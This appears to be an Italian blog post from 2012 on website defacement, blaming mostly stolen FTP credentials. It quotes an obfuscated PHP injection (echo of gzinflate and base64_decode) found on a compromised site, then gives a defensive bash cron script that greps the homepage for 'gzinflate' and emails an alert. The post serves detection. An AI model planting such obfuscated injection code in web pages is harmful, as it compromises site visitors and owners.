Script per tenere sotto controllo i siti vittima di defacing

Recentemente è aumentato a dismisura il numero di siti che hanno subito un defacing. Tale piaga può essere dovuta a diversi fattori:

1) vulnerabilità del Web server (ricordate il celeberrimo exploit per IIS che sfruttava una cattiva gestione dell’URL encoding?)

2) Vulnerabilità del sistema operativo che ospita il Web server (o di uno dei servizi attivi sulla macchina);

3) Furto delle credenziali FTP, soprattutto se sono state inviate via email.

defacing, pattern, bash, cracker, cron, script, monitoring

Vi assicuro che la terza ipotesi è quella più gettonata, nel senso che sempre più spesso si assiste ad un defacing proprio perchè i cracker hanno ottenuto accesso allo spazio FTP, riuscendo quindi a modificare a piacimento le pagine Web del sito vittima.

Ad esempio, in questo post ho discusso di un defacing avvenuto sul sito di un amico. Il pattern specifico che lo identificava era il seguente:

#c3284d# echo(gzinflate(base64_decode("JY5BjsIwEATvSPzBmgu7l1jaIxvnFXxgcIZ4VoltjRsCvydsbq2Wqqv7Fk0rHF5VAkGe8H/84L2l4XgYS7wvktGtpp CvU68340VcsxgoAfXsfTRh6EPUSmZDlwVeF56k+QZG62qq5PKGBbqsCoiR2xRlnjVPgfiOQu5/91psFAuUt4JnnXKguNk/QBKdEgL9kFt1RPqkoff7n+H0/X s89H4/PrwB"))); #/c3284d#

Ecco allora che ho pensato di creare uno scrip, da eseguire automaticamente mediante cron, che mi potesse segnalare la presenza del suddetto pattern sul sito che stavo monitorando:

#!/bin/bash

touch temp

data=`date`

wget nomesito.it

cat index.html | grep gzinflate >> temp

if [ -s temp ]; then
cat temp | mail -iv -s "$data: codice malevolo iniettato" vostro.indirizzo@email.it
fi

rm index.html*

rm temp

exit 0

Lo scrip è abbastanza banale ma vi assicuro che è di un’utilità pazzesca.

Potete modificarlo a vostro piacimento, basta che settate il sito da monitorare, il pattern (dopo il grep) ed il vostro indirizzo di posta elettronica (su cui verranno inviate le email di alert in caso di defacciamento).

Spero vi possa tornare utile.

Alla prossima.

Script per tenere sotto controllo i siti vittima di defacingultima modifica: 2012-10-05T08:55:00+00:00da nazarenolatella
Reposta per primo quest’articolo

Lascia un commento